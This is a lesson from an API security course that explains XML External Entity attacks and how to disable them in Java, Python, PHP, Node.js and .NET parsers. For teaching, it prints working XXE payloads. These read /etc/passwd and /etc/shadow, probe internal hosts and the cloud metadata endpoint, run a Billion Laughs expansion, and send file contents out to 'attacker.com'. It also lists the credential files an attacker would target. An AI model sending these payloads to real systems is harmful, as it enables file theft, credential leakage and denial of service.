API Security XML External Entity XXE Attacks

XML External Entity (XXE) attacks exploit a feature built into the XML specification itself. When an API parses XML input from a client without disabling certain XML processing features, an attacker can make the server read local files, connect to internal systems, or cause a denial of service — all through carefully crafted XML.

XXE is especially dangerous in SOAP APIs and any REST API that accepts XML. It consistently appears in the OWASP Top 10 vulnerabilities list.

Understanding XML Entities

To understand XXE attacks, you first need to understand what XML entities are. An entity in XML is like a variable — a short name that represents a piece of content. When the XML parser encounters the entity, it substitutes the entity's value.

Internal XML Entity (safe, built-in):

<!DOCTYPE note [
  <!ENTITY greeting "Hello, World!">
]>
<note>
  <message>&greeting;</message>
</note>

Parser resolves &greeting; to "Hello, World!":
Result: <message>Hello, World!</message>

This is a normal, legitimate feature of XML.

External entities work the same way, but instead of substituting a fixed value, they tell the XML parser to fetch content from an external source — a file on the server, or a URL.

External XML Entity (dangerous):

<!DOCTYPE data [
  <!ENTITY filecontents SYSTEM "file:///etc/passwd">
]>
<request>
  <data>&filecontents;</data>
</request>

Parser fetches: file:///etc/passwd (a local file on the server)
Substitutes the file contents into &filecontents;

Result: <data>root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
        ...all of /etc/passwd...The server reads its own password file and
includes it in the XML it processes.
If the API reflects this content back to the attacker, the file is leaked.

XXE in API Context

Attack Scenario: SOAP API for order processing

Normal SOAP Request:
POST /OrderService HTTP/1.1
Content-Type: text/xml

<soap:Envelope xmlns:soap="...">
  <soap:Body>
    <GetOrder>
      <OrderId>12345</OrderId>
    </GetOrder>
  </soap:Body>
</soap:Envelope>

Malicious XXE SOAP Request:
POST /OrderService HTTP/1.1
Content-Type: text/xml

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/shadow">
]>
<soap:Envelope xmlns:soap="...">
  <soap:Body>
    <GetOrder>
      <OrderId>&xxe;</OrderId>
    </GetOrder>
  </soap:Body>
</soap:Envelope>

If the XML parser is not configured securely:
  1. Parser reads /etc/shadow (Linux password hashes file)
  2. Inserts content into the OrderId field
  3. Server processes the query with this value
  4. Error messages or responses may reflect the file content back

Types of XXE Attacks

Type 1: File Disclosure XXE

Goal: Read files from the server's filesystem.

Interesting files to target:
  Linux:
    /etc/passwd          → User account information
    /etc/shadow          → Password hashes (if readable)
    /etc/hosts           → Internal network hostnames
    /proc/self/environ   → Environment variables (may contain secrets)
    /var/www/app/.env    → Application config with API keys, DB passwords
    ~/.ssh/id_rsa        → SSH private key

  Windows:
    C:\Windows\System32\drivers\etc\hosts
    C:\Users\Administrator\.ssh\id_rsa
    C:\inetpub\wwwroot\web.config   → IIS configuration with credentials

Type 2: Server-Side Request Forgery via XXE (SSRF)

Goal: Make the server send requests to internal systems.

Attacker-controlled XML:
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://192.168.1.100:8080/admin">
]>
<request>&xxe;</request>

The server fetches http://192.168.1.100:8080/admin
This is an internal IP — normally unreachable from the internet.
The server acts as a proxy for the attacker.

Attacker can:
  → Map internal network by trying different IPs and ports
  → Access cloud provider metadata APIs:
    http://169.254.169.254/latest/meta-data/    (AWS metadata)
    → Returns: IAM credentials, instance info, user data
  → Access internal admin panels with no authentication
  → Read internal API responses

Type 3: Billion Laughs (XML Denial of Service)

Goal: Crash the XML parser through exponential entity expansion.

The "Billion Laughs" attack:
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  ... (up to lol9)
]>
<lolz>&lol9;</lolz>

lol9 expands to: 10^9 copies of "lol"
= 1 billion "lol" strings = ~3 GB of data from a tiny XML input

Parser tries to hold this in memory → Out of memory error → Crash
This is a Denial of Service attack using only a few hundred bytes of input.

Type 4: Blind XXE via Out-of-Band Channels

Goal: Exfiltrate data when no response content is reflected.

Technique: Use DNS or HTTP to carry data to attacker's server.

<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % oob SYSTEM "http://attacker.com/?data=%file;">
]>
<foo>&oob;</foo>

The parser:
  1. Reads /etc/passwd into %file
  2. Makes HTTP request to attacker.com with file contents as parameter
  3. Attacker's server logs the request and receives the file data

Attacker never sees it in the API response.
They check their own server's logs.

The Fix: Disable External Entity Processing

The solution to XXE is disabling external entity processing in the XML parser. This is a simple configuration change but it is frequently forgotten.

Java (DocumentBuilderFactory):
  DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
  factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
  factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
  factory.setXIncludeAware(false);
  factory.setExpandEntityReferences(false);

Python (lxml):
  from lxml import etree
  parser = etree.XMLParser(
      resolve_entities=False,
      no_network=True,
      load_dtd=False
  )
  tree = etree.fromstring(xml_input, parser)

Python (defusedxml — recommended):
  import defusedxml.ElementTree as ET
  tree = ET.fromstring(xml_input)
  # defusedxml blocks XXE, billion laughs, and other XML attacks by default

PHP:
  libxml_disable_entity_loader(true);
  $doc = new DOMDocument();
  $doc->loadXML($xml, LIBXML_NONET | LIBXML_DTDLOAD);

Node.js (libxmljs):
  const doc = libxmljs.parseXml(xml, { noent: false, nonet: true });

.NET:
  XmlReaderSettings settings = new XmlReaderSettings();
  settings.DtdProcessing = DtdProcessing.Prohibit;
  settings.XmlResolver = null;
  XmlReader reader = XmlReader.Create(stream, settings);

Defense in Depth for XXE

Layer 1: Disable external entities in XML parser (PRIMARY — do this always)
Layer 2: Disable DTD processing entirely if not needed
Layer 3: Switch to JSON where possible (JSON has no entity concept)
Layer 4: Use allowlist input validation on XML content
Layer 5: Network egress controls — block outbound connections
         from server to prevent SSRF via XXE
Layer 6: WAF rules to detect DOCTYPE and ENTITY in requests
Layer 7: Run XML processing in a sandboxed environment

Identifying XXE Vulnerability in Your API

Indicators that an endpoint may be vulnerable:

1. Endpoint accepts Content-Type: text/xml or application/xml
2. SOAP service that processes client-supplied XML bodies
3. API that accepts file uploads including .xml, .docx, .xlsx, .svg
   (These formats are XML internally — parser may be triggered)
4. API that processes SVG files (SVG is XML — XXE works in SVG)
5. API using Excel/Word processing libraries on uploaded files
   (These parse XML internally — vulnerable if not hardened)

Testing: Send a request with a simple XXE payload and observe behavior.
Authorized testing only on systems you own or have permission to test.

Real-World XXE Incidents

XXE vulnerabilities have caused significant breaches. Security researchers found XXE vulnerabilities in Facebook's career portal, which allowed reading of server files. A well-known XXE vulnerability in Adobe Reader affected how the software processed XML, allowing attackers to read local files. Multiple enterprise applications including some SAML authentication implementations were found vulnerable to XXE because SAML assertions are XML documents — an attacker who could submit a crafted SAML assertion could exploit XXE in the identity provider's parser.

Key Points

XXE attacks exploit the XML external entity feature to make servers read local files or connect to internal services.
The four main attack types are file disclosure, SSRF via XXE, denial of service (Billion Laughs), and blind out-of-band exfiltration.
The fix is simple: disable external entity processing in the XML parser configuration. Use a library like defusedxml in Python for automatic protection.
File formats like SVG, DOCX, XLSX, and XML data feeds are all potential XXE attack vectors if processed without secure parser settings.
Consider switching from XML to JSON where possible — JSON has no entity concept and is immune to XXE.
SSRF via XXE can expose cloud provider metadata APIs, leaking IAM credentials and instance information.

Previous lesson

Back to course

Next lesson